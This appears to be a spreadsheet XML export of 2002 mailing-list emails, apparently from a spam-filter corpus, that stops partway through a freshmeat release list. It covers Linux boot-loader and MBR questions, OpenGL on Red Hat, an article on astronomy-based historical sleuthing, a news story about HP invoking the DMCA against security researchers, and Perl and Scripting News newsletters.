    <t>&gt; I thought perhaps I should just do   lilo -b /dev/hdb -r /mnt  but I think\n&gt; that -b is analogous to the boot keyword in lilo.conf. Or will this just\n&gt; work automagically ?  i.e. boot = /dev/hda tells lilo what numbers to poke\n&gt; where, and it figures out where the disk is from the -r ?\n\nThat won't work like you want.  You'll end up with a boot loader\non the backup disk that contains the 'physical' location of\nthe /boot/map file on the main disk.  That won't necessarily\nbe the same as the backup disk.\n\nI can't think of a right way to do his with LILO.  I've got\na similar seup on my home machine (rsync to a backup disk\nevery night), but I'll be pulling out the RH install CDs to\nget LILO sorted if I have to do a disk swap.\n\nGRUB should be able to handle this no problem, since it\ndoesn't record sector numbers like LILO does.  Not much help\nfor you though...\n\nLater,\nKenn\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Ralf Ertzinger &lt;ralf@camperquake.de&gt;\nDate: Wed, 31 Jul 2002 10:53:51 +0200</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 10:53:51 +0200</t>
  </si>
  <si>
    <t>Hi. John Hinsley  wrote: &gt; Querying the rpm database for OpenGL gets me nowhere fast. Can anyone &gt; point me in the right direction? What, in RedHat, provides OpenGL? The X server itself does (or does not, depending on your driver). There is a software fallback called Mesa compiled in the X server, which is used as a fallback. So, if you have installed X, you have OpenGL. Try the glxinfo command to see the capabilities provided by your X system. --  R! _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Rick Moen &lt;rick@linuxmafia.com&gt;\nDate: Wed, 31 Jul 2002 10:48:44 -0700</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 10:48:44 -0700</t>
  </si>
  <si>
    <t>Rick Moen &lt;rick@linuxmafia.com&gt;</t>
  </si>
  <si>
    <t>Quoting jac1 (jac1@student.cs.ucc.ie):\n\n&gt; i recently had to wipe linux from my pc but forgot to restore the original\n&gt; MBR (NT). Anyone know how i can do this? linux is entirely gone and no boot\n&gt; floppy. formatting the entire disk doesn't do it either.\n\nThe easy way is just to install whatever Microsoft or whatever OS you\nhave in mind:  It should overwrite the MBR.  Indeed, the problem is\nusually _preventing_ this from happening, as Microsoft Corporation's\ninstallers seem to forever be overwriting your MBRs when you least wish\nit, without asking your permission.\n\n-- \nCheers,               "We're sorry; you have reached an imaginary number.\nRick Moen             Please rotate your 'phone ninety degrees and try again."\nrick@linuxmafia.com\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Hunt, Bryan" &lt;B.Hunt@emuse-tech.com&gt;\nFrom: SoloCDM &lt;deedsmis@aculink.net&gt;\nDate: Wed, 31 Jul 2002 10:48:16 -0600</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 10:48:16 -0600</t>
  </si>
  <si>
    <t>"Hunt, Bryan" &lt;B.Hunt@emuse-tech.com&gt;</t>
  </si>
  <si>
    <t>"Hunt, Bryan" stated the following:\n&gt; \n&gt; you need to do a "fdisk /mbr" from a bootable windoze floppy\n&gt; alternatively boot from linux boot disk and do fdisk, delete all partitions.\n\nI need to ask a question concerning this issue.\n\nWhat if I don't want to get rid of the MBR -- it will destroy the OS\non that drive.  How do I remove lilo without the above fdisk\nprocedure?\n\n&gt; -----Original Message-----\n&gt; From: jac1 [mailto:jac1@student.cs.ucc.ie]\n&gt; \n&gt; i recently had to wipe linux from my pc but forgot to restore the original\n&gt; MBR (NT). Anyone know how i can do this? linux is entirely gone and no boot\n&gt; floppy. formatting the entire disk doesn't do it either.\n\n-- \nNote: When you reply to this message, please include the mailing\n      list/newsgroup address and my email address in To:.\n\n*********************************************************************\nSigned,\nSoloCDM\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Flatware or Road Kill? &lt;FoRK@xent.com&gt;\nFrom: Rodent of Unusual Size &lt;Ken.Coar@Golux.Com&gt;\nDate: Wed, 31 Jul 2002 10:28:24 -0400</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 10:28:24 -0400</t>
  </si>
  <si>
    <t>Rodent of Unusual Size &lt;Ken.Coar@Golux.Com&gt;</t>
  </si>
  <si>
    <t>Flatware or Road Kill? &lt;FoRK@xent.com&gt;</t>
  </si>
  <si>
    <t>Bits for posterity: Astronomical sleuthing</t>
  </si>
  <si>
    <t>From: Donald Eastlake 3rd  July 16, 2002 By Yonder Blessed Moon, Sleuths Decode Life and Art By LEON JAROFF On its way back from the Pacific island of Tinian, where it had delivered the uranium core for the atomic bomb that destroyed Hiroshima, the heavy cruiser Indianapolis was torpedoed by the Japanese submarine I-58 and sent to the bottom of the Philippine Sea. It was one of the worst disasters in American naval history; only 317 of its nearly 1,200 crew members survived. Now experts at Southwest Texas State University have given that tragic story a startling new twist. It was the moon, they say, that sank the Indianapolis. Or anyway, they write in the July issue of Sky &amp; Telescope, it was the moon that made the sinking possible. Using astronomical computer programs, records and weather reports, as well as the known coordinates and running speeds of the ship and the submarine that sank it, the authors determined that when the I-58 surfaced, it was perfectly aligned, west to east, with the cruiser. And, they said, a three-quarter moon had just emerged from behind the clouds. Looking across the moonlit water, an I-58 crewman spotted the ship silhouetted against the sky, 10.3 miles away. Half an hour later, six torpedoes sent it to the bottom. "It was sheer chance," said Dr. Donald Olson, an astronomer. "Without that alignment with the moon, the lookouts would not have spotted the cruiser, especially at that distance." With Russell Doescher, a physics lecturer, Dr. Olson conducts a university honors course called "Astronomy in Art, History and Literature." In the last 15 years, he has pinpointed the time and place of the rendering of art masterpieces, given new interpretations of astronomical references in Chaucer and revealed the decisive role of the moon in military and other encounters. Two years ago, for example, Dr. Olson turned his attention to the bright star in van Gogh's "White House at Night." He and some students went to Auvers, France, where van Gogh created his final works, and searched until they found the house, largely unchanged. Sifting through letters from van Gogh to his brother, Dr. Olson found that the painting was completed in June 1890. Noting the orientation of the house in the painting, he determined where van Gogh had set his easel and what section of the sky he had portrayed, and from the lighting and shadows, he established that the house had been illuminated by the setting sun. His computer analysis then identified the "star." It was Venus, which in early evening in mid-June had occupied that part of the sky. A final check of local weather records pinpointed the actual date van Gogh had composed the painting, June 16, the only clear day in the middle of the month that year. Dr. Olson has also turned his attention to Shakespeare, intrigued by the opening of "Hamlet," when guards on the ramparts of Elsinor refer to the "star that's westward from the pole had made his course to illume that part of heaven where now it burns." From the guards' description, the season and the time, other astronomers had suggested several bright stars as possibilities, but Dr. Olson's calculations placed it in the constellation Cassiopeia, which lacks any notably luminous stars. Pondering this problem on a trip with his wife, Dr. Olson was suddenly inspired. He was aware that in 1572, a supernova, called Tycho's star, for the Danish astronomer Tycho Brahe, suddenly flamed in Cassiopeia, creating a worldwide sensation. Shakespeare, 8 at the time, would certainly have recalled the event, and his memory was probably refreshed by the description of the supernova in a history book that was the source of some of his best-known plays. Dr. Olson has no doubt that the star that glared above Elsinor that night was Tycho's, and he has an impressive record of other astronomy-based sleuthing. Aware that the photographer Ansel Adams often neglected to date his negatives, Dr. Olson set out to find when Adams had shot his classic "Moon and Half Dome." At Yosemite, Dr. Olson and his students found Adams's vantage point, studied the location, phase and features of the moon in the photograph, plus the shadows on the Dome, snow on the peak and other clues, and then announced that the picture had been taken at 4:14 p.m., Dec. 28, 1960. Then, Dr. Olson calculated that the setting would be virtually identical at 4:05 p.m. on Dec. 13, 1994. On that day Adams's daughter-in-law visited Yosemite and was photographed holding a print of "Moon and the Half Dome" in the foreground of an eerily similar view of the actual moon and the Half Dome. Analyzing Chaucer's works, Dr. Olson has confirmed that a particularly rapid movement of the moon described in "The Merchant's Tale" occurred in April 1389. And in "The Franklin's Tale," Chaucer's description of the heavenly alignment that caused an exceptionally high tide on the Brittany coast, convinced Dr. Olson that Chaucer was an advanced amateur astronomer. Then there was Paul Revere. On his way to saddle up for his famous ride, how did he manage to row undetected past a British warship on a moonlit night in Boston Harbor? Dr. Olson's computer program revealed that, while the moon was nearly full that night, it was unusually close to the southern horizon and did not illuminate Revere's boat. Dr. Olson's proudest achievement was explaining "the tide that failed" in the bloody Marine Corps landing at Tarawa atoll on Nov. 20, 1943. Planners had expected a tide to provide a water depth of five feet over a reef some 600 yards from shore, allowing larger landing craft, with drafts of at least four feet, to pass. But that day and the next, in the words of some observers, "the ocean just sat there," providing neither low tide nor high tide and leaving a mean depth of three feet over the reef. The craft grounded on the edge of the reef, and many marines were killed or injured as they waded 600 yards to the shore, rifles over their heads, in the face of machine-gun fire from the Japanese. Asked by a former marine about the tidal phenomenon, Dr. Olson spent six months researching and mastering tidal theory and discovered that the military planners were aware that they had to contend with a "neap" tide. This phenomenon occurs twice a month when the moon is near its first or last quarter, because the countering tug of the sun causes water levels to deviate less. But that day, the moon was also almost at its farthest point from earth and exerted even less pull, leaving the waters relatively undisturbed and the marines in trouble. "I'm not in the least blaming the planners," Dr. Olson said, explaining that the techniques used in accurately determining tides hadn't been applied to the waters at Tarawa. Indeed, he modestly claims, by using his computer program, "We can calculate the tides in any port in the world on any day in history." Yet Dr. Olson's greatest satisfaction seems to stem from his interdisciplinary approach to astronomical sleuthing. "I have thought about van Gogh, about Shakespeare and Chaucer," he says, "and that has made my life as a scientist much richer." [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "'Patton, Tony'" &lt;tony.patton@nwifhe.ac.uk&gt;,\nFrom: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nDate: Wed, 31 Jul 2002 09:55:40 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 09:55:40 +0100</t>
  </si>
  <si>
    <t>"'Patton, Tony'" &lt;tony.patton@nwifhe.ac.uk&gt;,</t>
  </si>
  <si>
    <t>I am the evil one, you will respect my authoritai ;--)\n\nSorry, but I couldn't resist, I must say that mails like this really impress\nme. coz I have pretty much no Irish at all, although my wee Girl starts\nGaelscoil in September so there hope for me yet :)\n\nMuch Respect to the Gaeilgors out there. \n\nCW\n\n-------------------\nmar\n&gt; gheall ar an Hike ar an gclr - an mbeidh t fin n aon duine eile le\n&gt; Gaeilge ar an Hike go bhfios duit?\n&gt; \n&gt; Go raibh maith agat as do chabhair,\n&gt; \n\n----&gt;8\n\nCan someone translate this for me? Lost all sense of Irish when moved\nover the border about 10 years ago. Not by choice mind you :-(\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "Jon O." &lt;jono@networkcommand.com&gt;\nDate: Wed, 31 Jul 2002 09:50:20 -0700</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 09:50:20 -0700</t>
  </si>
  <si>
    <t>"Jon O." &lt;jono@networkcommand.com&gt;</t>
  </si>
  <si>
    <t>vkatalov@elcomsoft.com: Security warning draws DMCA threat</t>
  </si>
  <si>
    <t>Looks like HP is using the DMCA to prevent full disclosure of security vulnerablities. This is not a good precedent... ----- Forwarded message from Vladimir Katalov  ----- From: Vladimir Katalov  Reply-To: Vladimir Katalov  Organization: ElcomSoft Co.Ltd. Subject: [DMCA_Discuss] Security warning draws DMCA threat Date: Wed, 31 Jul 2002 15:04:26 +0400 [URL]http://news.com.com[/URL] By Declan McCullagh Staff Writer, CNET News.com July 30, 2002, 4:48 PM PT WASHINGTON--Hewlett Packard has found a new club to use to pound researchers who unearth flaws in the company's software: the Digital Millennium Copyright Act. Invoking both the controversial 1998 DMCA and computer crime laws, HP has threatened to sue a team of researchers who publicized a vulnerability in the company's Tru64 Unix operating system. In a letter sent on Monday, an HP vice president warned SnoSoft, a loosely organized research collective, that it "could be fined up to $500,000 and imprisoned for up to five years" for its role in publishing information on a bug that lets an intruder take over a Tru64 Unix system. HP's dramatic warning appears to be the first time the DMCA has been invoked to stifle research related to computer security. Until now, it's been used by copyright holders to pursue people who distribute computer programs that unlock copyrighted content such as DVDs or encrypted e-books. If HP files suit or persuades the federal government to prosecute, the company could set a precedent that stifles research into computer security flaws, a practice that frequently involves publishing code that demonstrates vulnerabilities. The DMCA restricts code that "is primarily designed or produced for the purpose of circumventing protection" of copyrighted works. On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias "Phased," said in the message: "Here is the warez, nothing special, but it does the job." That public disclosure drew the ire of Kent Ferson, a vice president in HP's Unix systems unit, who alleged in his letter on Monday that the post violated the DMCA and the Computer Fraud and Abuse Act. [...] _______________________________________________ ------------------------ [URL]http://www.anti-dmca.org[/URL] ------------------------ DMCA_Discuss mailing list DMCA_Discuss@lists.microshaft.org [URL]http://lists.microshaft.org[/URL] ----- End forwarded message ----- [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://news.com.com http://www.anti-dmca.org http://lists.microshaft.org http://xent.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Doug Stewart &lt;zamoose610@yahoo.com&gt;\nDate: Wed, 31 Jul 2002 08:50:48 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 08:50:48 -0700 (PDT)</t>
  </si>
  <si>
    <t>Two questions</t>
  </si>
  <si>
    <t>Maybe I'm just blind, but I've been poking through the archives of this list trying to find 1) what up-to-date KDE3 repositories are available and 2) where all the Xine skins went. Anybody? __________________________________________________ Do You Yahoo!? Yahoo! Health - Feel better, live better [URL]http://health.yahoo.com[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://health.yahoo.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: John Hinsley &lt;johnhinsley@blueyonder.co.uk&gt;\nDate: Wed, 31 Jul 2002 05:34:37 +0100</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 05:34:37 +0100</t>
  </si>
  <si>
    <t>OpenGL</t>
  </si>
  <si>
    <t>First, thanks for all the rpms, and especially ogle (which comes very close to  working perfectly on my Cyrix 333 box!). Now, I desperately need some games, especially TuxKart and FlightGear, but I  forever get stuck on a dependency: everything needs OpenGL. Querying the rpm  database for OpenGL gets me nowhere fast. Can anyone point me in the right  direction? What, in RedHat, provides OpenGL? Sorry for the question, but I've just switched from SuSE and I'm used to being  able to tell YaST to sort out the dependencies........ Cheers John _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: legit-list-scriptingnews@spamassassin.taint.org\nFrom: webmaster@userland.com\nDate: Wed, 31 Jul 2002 05:00:42 GMT</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 05:00:42 GMT</t>
  </si>
  <si>
    <t>webmaster@userland.com</t>
  </si>
  <si>
    <t>legit-list-scriptingnews@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Scripting News Update</t>
  </si>
  <si>
    <t xml:space="preserve">  |  |\n![]([URL]http://static.userland.com[/URL] |  \n---|---  \n  \nApparently the NY Mets couldn't find a way to compromise with some of the\nteam's most dedicated fans. A sad day for New York baseball. What would Mookie\nsay?? ![]([URL]http://www.scripting.com[/URL]  \n  \nSalon: "Listen's $10-per-month Rhapsody service has a fantastic interface,\nand, since it has content from all five labels, you can find much of what\nyou'd like on it. You can listen to any song as often as you'd like -- an\noption that gives a taste of what a perfect subscription service would feel\nlike. The only trouble is, Listen won't let you burn -- and, as one file\ntrader asked, 'Who wants to be stuck listening to shit at their computer?'"\n![]([URL]http://www.scripting.com[/URL]  \n  \nMartin Schwimmer, a trademark attorney and Mets fan, weighs in on Bryan Hoch's\nMetsOnline situation.\n![]([URL]http://www.scripting.com[/URL]  \n  \nJoel Klein, Microsoft's chief prosecutor in the Clinton Administration, is\nnamed chancellor of New York's public school system.\n![]([URL]http://www.scripting.com[/URL]  \n  \nIt's been one week since Salon's blogs booted up. Scott Rosenberg posts a\nprogress report.\n![]([URL]http://www.scripting.com[/URL]  \n  \nFarrFeed: "I love this stuff."\n![]([URL]http://www.scripting.com[/URL]  \n  \nI know this isn't big news for most of you, but I'm no longer the first Dave\non Google. Maybe someday I will be, again. :-(\n![]([URL]http://www.scripting.com[/URL]  \n  \nWell, yesterday I went for my 30-day post op review (it was actually 38 days\nafter I was discharged) and there was good news and bad news. The good news is\nthat I'm healing quickly. My body is very strong and doing really well. My\nblood pressure is great. Heart rate is great. Cholesterol needs work and I\nhave to lose a bunch of weight, and of course I can't smoke. Now the bad news.\nI have to be a saint for the rest of my life. I knew this day was coming. As I\nstart to feel better, I want to relax. That ain't going to happen. Oy. Here's\nmy old theme song. "Don't ask me to be Mister Clean, cause baby I don't know\nhow." I need a new song. Oh mama.\n![]([URL]http://static.userland.com[/URL]\n![]([URL]http://www.scripting.com[/URL]\n\n /images/2001/09/20/sharpPermaLink3.gif)  \n  \nEd Cone's got the blogging bug: "I filed my N&amp;R; column about the bad proposed\ncorporate hacking bill. It will run on Sunday -- it's an early deadline no\nmatter what, but after blogging for a few months it's almost painful to wait\nso long. I feel like just posting it now, or scooping myself with the best\nparts....but patience is a virtue." _Hehe._\n![]([URL]http://www.scripting.com[/URL]  \n  \nHistorian Stephen Ambrose, who is interviewed on the PBS News Hour today: "You\ncan do whatever the hell you want. Who's going to criticize you? And if they\ndo, what the hell do you care?"\n![]([URL]http://www.scripting.com[/URL]  \n  \nRadio Free Blogistan: Blogger vs Radio.\n![]([URL]http://www.scripting.com[/URL]  \n  \nReuters: "Stocks briefly extended their losses in late morning trading on\nTuesday, biting into Monday's monster rally."\n![]([URL]http://www.scripting.com[/URL]  \n  \n![A picture named\nbryanHoch.gif]([URL]http://radio.weblogs.com[/URL]\nto Glenn Reynolds for the link to metsonline.net. As a Mets fan since 1962, I\nthink it's great that sites like this exist and are flourishing. Like Bryan\nHoch, the webmaster, I also run websites as a labor of love, and know there\nisn't generally a whole lot of money left over after you pay for bandwidth. I\ntotally believe Hoch, a college student, when he says he isn't making money.\nThe site clearly disclaims that it is not representative of the Mets or Major\nLeague Baseball. If you go deeper you see that Hoch contributed his time for\nfree to help the Mets improve their own site, before all sites were taken over\nby MLB in 2001 (what a bad idea, why can't teams differentiate themselves\nbased on the quality of their community sites). Now of course there's another\nside to it, so let's keep an open mind. But to the owners of the Mets, please\nremember, it's the fans that make it work, and it's pretty clear that this\nwebsite is from the fans, for the fans and the team, and that's a good thing.\n![]([URL]http://www.scripting.com[/URL]  \n  \nPostscript: I've been emailing with Bryan, and asked if the local NY press has\ntaken up his cause. He says: "Not yet. You can help by calling any one of the\nmajor metro papers (Post, Daily News, Times, Newsday)." More.. Ernie the\nAttorney is looking into this. "LSU Law School is suing one of its students\nfor trademark infringement over a website that he maintains. The site is\ncalled lsulaw.com, and it includes a school calendar, law-related links and\ncomments by Douglas Dorhauer, some of them critical of the law school."\n![]([URL]http://www.scripting.com[/URL]  \n  \nBret Fausett, yesterday: "It's hard to imagine a more complete win than what\nICANN Director Karl Auerbach received today from Los Angeles Superior Court\nJudge Dzintra Janavs."\n![]([URL]http://www.scripting.com[/URL]  \n  \nJames Jarrett wonders where is his blog flow?\n![]([URL]http://www.scripting.com[/URL]  \n  \nMark Crane writes: "Woke up early the other morning, and started listening to\na BBC special on the Silicon Valley. Suddenly I heard the voice of Dave Winer,\nand he sounded like this mellow California hippy-geek. You should do a DaveNet\nthat is just a stream of you reading the essay. Hearing the Dave voice totally\nchanged my perceptions of the Dave Winer experience." _It's true, I have a\npretty soft voice. I laugh a lot too. Many people are surprised._\n![]([URL]http://www.scripting.com[/URL]  \n  \nOSCON, last week, has done its job and stirred the embers of the Great Open\nSource Debate of the 1990s. I found myself writing in an email yesterday:\n"Very little really usable software has come from people who are willing to\nwork for $0. (I chose my words carefully, infrastructure is another matter\nentirely.) Further, it's weird to say, as Richard Stallman does, that by\ncoercing programmers to work for $0 that that's freedom. To me it seems\nobvious that that's slavery."\n![]([URL]http://www.scripting.com[/URL]  \n  \nWashington Post: "Operated for years by Internet addressing giant VeriSign\nInc., dot-org is slated to get a new landlord in October when VeriSign\nrelinquishes its hold on the domain."\n![]([URL]http://www.scripting.com[/URL]  \n  \nTwo years ago on this day: "The best standard is the one with the most users."\n![]([URL]http://www.scripting.com[/URL]  \n  \nPonder yesterday's riddle. Then click on the solution.\n![]([URL]http://static.userland.com[/URL]\n![]([URL]http://www.scripting.com[/URL]  \n  \n\n</t>
  </si>
  <si>
    <t>http://static.userland.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://static.userland.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://radio.weblogs.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://www.scripting.com http://static.userland.com http://www.scripting.com</t>
  </si>
  <si>
    <t>To: ILUG (Request) &lt;ilug@linux.ie&gt;\nFrom: SoloCDM &lt;deedsmis@aculink.net&gt;\nDate: Wed, 31 Jul 2002 04:43:56 -0600</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 04:43:56 -0600</t>
  </si>
  <si>
    <t>ILUG (Request) &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] C++ and C Mailing Lists for Beginners and Advanced</t>
  </si>
  <si>
    <t>Are there any mailing lists (non-newsgroups) for C++ and C Beginners\nand Advanced programmers?\n\nLinks are welcomed!\n\n-- \nNote: When you reply to this message, please include the mailing\n      list/newsgroup address and my email address in To:.\n\n*********************************************************************\nSigned,\nSoloCDM\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 31 Jul 2002 02:00:29 +0000</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 02:00:29 +0000</t>
  </si>
  <si>
    <t>pudge@perl.org</t>
  </si>
  <si>
    <t>yyyy-use-perl@spamassassin.taint.org</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-07-31</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * Mac OS X Conference Registration Opens\n    * New Pumpking is Crowned\n\n+--------------------------------------------------------------------+\n| Mac OS X Conference Registration Opens                             |\n|   posted by ziggy on Monday July 29, @22:58 (events)               |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]gnat writes "[1]Registration is now open for the O'Reilly [2]Mac OS X\nConference. Look for sessions by Randal Schwartz and brian d foy ("[3]Programming\nPerl on Mac OS X"), Dan Sugalski ("[4]Programming Cocoa with Perl"),\nDavid Wheeler ("[5]Migrating from Linux to Mac OS X"), and many other\npeople from the world of Perl."\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:gnat@oreilly.com\n    1. [URL]http://conferences.oreillynet.com[/URL]\n    2. [URL]http://conferences.oreillynet.com[/URL]\n    3. [URL]http://conferences.oreillynet.com[/URL]\n    4. [URL]http://conferences.oreillynet.com[/URL]\n    5. [URL]http://conferences.oreillynet.com[/URL]\n\n\n+--------------------------------------------------------------------+\n| New Pumpking is Crowned                                            |\n|   posted by pudge on Tuesday July 30, @16:15 (releases)            |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]Dan writes "One of the many things that's come out of this year's TPC\nis the appointment of a new Pumpking. No, not Hugo van der Sanden, who\nhopefully everyone knows is taking on the task of 5.9 and 5.10. No, I'm\ntalking about the inimitable Michael Schwern, who's now holder of the\nperl 1 pumpkin and, I'm assured, is well on the way to a new maintenance\nrelease. Details are over on [1]dev.perl.org. Join the porters list and\nhelp Schwern out!" Yes, he said "perl 1".\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://yetanother.org[/URL]\n    1. [URL]http://dev.perl.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conferences.oreillynet.com http://conferences.oreillynet.com http://conferences.oreillynet.com http://conferences.oreillynet.com http://conferences.oreillynet.com http://use.perl.org http://use.perl.org http://yetanother.org http://dev.perl.org http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Wed, 31 Jul 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-07-31</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nMac OS X Conference Registration Opens\n    posted by ziggy on Monday July 29, @22:58 (events)\n    [URL]http://use.perl.org[/URL]\n\nNew Pumpking is Crowned\n    posted by pudge on Tuesday July 30, @16:15 (release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t>
  </si>
  <si>
    <t>To: freshmeat-news@freshmeat.net\nFrom: freshmeat-news-admin@lists.freshmeat.net\nDate: Wed, 31 Jul 2002 00:10:10 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 31 Jul 2002 00:10:10 -0400 (EDT)</t>
  </si>
  <si>
    <t>freshmeat-news-admin@lists.freshmeat.net</t>
  </si>
  <si>
    <t>freshmeat-news@freshmeat.net</t>
  </si>
  <si>
    <t>[fm-news] Newsletter for Tuesday, July 30th 2002</t>
  </si>
  <si>
    <t>::: L I N K S   F O R   T H E   D A Y :::\n\nToday's news on the web: [URL]http://freshmeat.net[/URL]\nfreshmeat.net newsgroup: news://news.freshmeat.net/fm.announce\n\n--- --.-  -----.-.------  -.. ..-- - -...---- -- -.- -----... - -\n\n::: A D V E R T I S I N G :::\n\nSponsored by the USENIX Security Symposium\n\nLearn how to improve the security of your systems &amp; networks! OS Security\n*Access Control *Sandboxing *Web Security and more! *11th USENIX SECURTY\nSYMPOSIUM * August 5-9, 2002 * San Francisco Register onsite for your FREE\nEXHIBIT PASS!  \n\n[URL]http://www.usenix.org[/URL]\n\n-.------.---.---- -.------.--.- --.-.- - -  -- --.--- --.--- -.- \n\n::: R E L E A S E   H E A D L I N E S (107) :::\n\n[001] - abcm2ps 3.1.1 (Development)\n[002] - amSynth 1.0 beta 5 \n[003] - Calculating Pi First Release (Simple Harmonic Motion)\n[004] - CbDockApp 1.00 \n[005] - cdinsert and cdlabelgen 2.4.0 (Stable)\n[006] - cdrecord 1.11a28 \n[007] - Cell Phone SMS AIM 1.6 \n[008] - CherryPy 0.4 \n[009] - Chronos 1.1.1 \n[010] - CLIP 0.99.4 \n[011] - countertrace 1.0 \n[012] - CRWInfo 0.2 \n[013] - DaDaBIK 2.1 beta \n[014] - Danpei 2.8.2 (Stable)\n[015] - dchub 0.1.2 \n[016] - Distributed Checksum Clearinghouse 1.1.8 \n[017] - dnstracer 1.6 \n[018] - Document Manager 2.0-pre1 (Development)\n[019] - dougnet 1.0 \n[020] - Dump/Restore 0.4b31 \n[021] - DungeonMaker 2.01 \n[022] - File Roller 2.0.0 \n[023] - FrontStella 1.2 \n[024] - gCVS 1.0b4 \n[025] - gimp-print 4.2.2-pre4 (Stable)\n[026] - gnocl 0.5.1 \n[027] - GnomeICU 0.98.3 \n[028] - GNUstep 1.4.0 (LaunchPad)\n[029] - grocget 0.5 \n[030] - hdup 1.4.0-1 (Stable)\n[031] - Highlight 0.1 \n[032] - honeyd 0.3 \n[033] - ioperm for Cygwin 0.1 \n[034] - IPSquad Packages From Scratch 0.6 \n[035] - j 0.16.1 \n[036] - jmame 0.3-beta \n[037] - Kadmos OCR/ICR engine 3.5q \n[038] - Kallers 0.2.2 \n[039] - Kemerge 0.6 \n[040] - KMencoder 0.1.2 \n[041] - KMyIRC 0.2.2 (Alpha)\n[042] - koalaXML 0.3.0 \n[043] - Koch-Suite 0.7 (Development)\n[044] - Lago 0.5.2-gcc3.patch \n[045] - libdv 0.98 \n[046] - Lindenmayer Systems in Python 1.0 \n[047] - LM-Solve 0.5.6 (Development)\n[048] - MKDoc 1.4 \n[049] - mksysdisp 0.1.4 \n[050] - Mondo 0.7 (Stable)\n[051] - Mysql-sdb 0.1a \n[052] - NNTPobjects 0.9 \n[053] - ogmtools 0.7 \n[054] - One-Wire Weather 0.67.10 \n[055] - Open Remote Collaboration Tool 1.0.1 \n[056] - OpenCL 0.8.7 \n[057] - OpenEJB 0.8 Final \n[058] - OpenOffice Indexer 0.1 (Development)\n[059] - OSSP cfg 0.9.0 \n[060] - OSSP fsl 0.1.12 \n[061] - OSSP l2 0.9.0 \n[062] - Papercut NNTP Server 0.8.3 \n[063] - PEANUTS 1.03 \n[064] - PHP Online RPG 1.1 \n[065] - phpMyAdmin 2.3.0-rc4 (Unstable)\n[066] - PHPTalk 0.9 \n[067] - phpTest 0.6.1 \n[068] - php_passport_check 0.1 \n[069] - php_writeexcel 0.1.1 \n[070] - poweroff 0.4 \n[071] - PPPOEd 0.49 \n[072] - QtMyAdmin 0.4 \n[073] - Quantum GIS 0.0.2 (Development)\n[074] - RedBase Pure Java RDBMS 1.5 \n[075] - RH Email Server 0.9.8.1 \n[076] - S/MIME Library for Java 1.5.0 \n[077] - Secure FTP Wrapper 2.5.2 \n[078] - Server optimized Linux 15.00 \n[079] - Sharp Tools Spreadsheet 1.4 (Stable)\n[080] - Simple TCP Re-engineering Tool 0.8.0 \n[081] - SimpleFirewall 0.7-2 \n[082] - 